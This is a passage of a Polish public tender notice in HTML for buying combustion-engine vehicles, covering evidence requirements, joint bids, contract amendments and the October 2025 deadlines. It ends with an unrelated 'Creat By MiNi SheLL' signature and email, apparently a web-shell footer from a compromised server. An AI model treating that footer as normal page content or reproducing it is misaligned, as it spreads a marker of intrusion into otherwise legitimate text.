oficjalnego kanału sprzedaży na terenie RP. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zgodnie z przepisem art. 107 ust. 2 ustawy Pzp., jeżeli Wykonawca nie złoży wraz z ofertą przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie Wykonawcę do ich złożenia lub uzupełnienia w wyznaczonym terminie. Zgodnie z przepisem art. 107 ust. 4 ustawy Pzp, Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych:<br/>a) Specyfikacji Technicznej Oferowanego Pojazdu (STOP) według wzoru stanowiącego Załącznik nr 4A (dla Pojazdu o napędzie spalinowym - Typ I) lub 4B (dla Pojazdu o napędzie spalinowym - Typ II);<br/>b) karty technicznej, specyfikacji technicznej producenta lub inny dokument potwierdzający, że zaoferowany Pojazd spełnia minimalne wymagania określone w Szczegółowym Opisie Przedmiotu Zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wymagania w tym zakresie zostały wskazane w Rozdziale 9 SWZ:<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem, którego adres oraz dane kontaktowe należy wpisać w Formularzu ofertowym.<br/>3. Pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o zamówienie lub inny dokument (np. umowa konsorcjum), z którego wynika takie pełnomocnictwo należy złożyć razem z ofertą.<br/>4. Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie, o którym mowa w Rozdziale 7 ust. 1 SWZ, zgodne z treścią Załącznika nr 5 do SWZ, aktualne na dzień składania ofert, celem wstępnego potwierdzenia, że każdy z Wykonawców ubiegających się wspólnie o zamówienie nie podlega wykluczeniu z postępowania na podstawie art.<br/>108 ust. 1 ustawy Pzp oraz spełnia warunki udziału w postępowaniu określone w SWZ a także oświadczenie dotyczące przesłanek wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>5. Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną i mają do nich zastosowanie zasady określone w niniejszym rozdziale. Spółka cywilna ubiegająca się o zamówienie musi wyznaczyć pełnomocnika do jej reprezentowania. Ustawowe zasady reprezentacji spółki cywilnej zezwalające każdemu wspólnikowi na jej reprezentowanie w takich granicach, w jakich jest uprawniony do prowadzenia jej spraw, nie spełniają bowiem wymogu z art. 58 ust. 2 ustawy Pzp.<br/>6. W przypadku Wykonawców składających ofertę wspólną wynagrodzenie należne Wykonawcy wpłacane będzie na konto podmiotu zwanego Liderem, wskazanego wspólnie przez podmioty występujące jako Wykonawca.<br/>7. Zamawiający nie określił odmiennych wymagań związanych z realizacją zamówienia w odniesieniu do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>8. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje zmiany umowy w związku z art. 455 ust . 1 pkt 1 Pzp, których szczegółowy opis został wskazany w § 11 ust. 2 Umowy (Załączniku nr 2 do SWZ).<br/>2. Strony, w związku z art. 455 ust. 1 pkt 1 ustawy Pzp, dopuszczają możliwość wprowadzenia do umowy następujących zmian:<br/>1) w okresie od dnia zawarcia Umowy do zakończenia Realizacji Dostawy tj. podpisania bez zastrzeżeń przez Strony Ostatecznego Protokołu Odbioru dopuszczalne są zmiany niektórych elementów wyposażenia zaoferowanego przez Wykonawcę Pojazdu, pod warunkiem, że parametry techniczne, funkcjonalne zmienionych elementów wyposażenia będą co najmniej spełniały minimalne wymagania i parametry określone w SOPZ oraz STOP,<br/>2) w okresie od dnia zawarcia Umowy do zakończenia Realizacji Dostawy tj. podpisania bez zastrzeżeń przez Strony Ostatecznego Protokołu Odbioru dopuszczalne są zmiany terminu określonego w § 6 ust. 2 Umowy,<br/>z zastrzeżeniem, że ewentualne przesunięcie terminu dostawy lub odbioru pojazdu nie może spowodować dostawy Pojazdu w terminie późniejszym niż ostatni Dzień roboczy roku kalendarzowego w którym Strony zawrą umowę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty składa się wyłącznie za pośrednictwem platformy ezamówienia.gov.pl. Szczegółowe zapisy w tym zakresie zostały określone w rozdziale 13 SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-06 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Uwaga! Zamawiający na podstawie art. 16a oraz 16b ust. 2 ustawy Prawo zamówień publicznych - nie dopuszcza do udziału w niniejszym postępowaniu Wykonawców z państw trzecich, które nie są stronami Porozumienia Światowej Organizacji Handlu w sprawie zamówień rządowych lub innych umów międzynarodowych gwarantujących na zasadzie wzajemności i równości dostęp do rynku zamówień publicznych, których stroną jest Unia Europejska. Oferty złożone przez takich Wykonawców będą podlegały odrzuceniu na podstawie art. 226 ust. 1 pkt 5a ustawy Prawo zamówień publicznych.

Creat By MiNi SheLL
Email: jattceo@gmail.com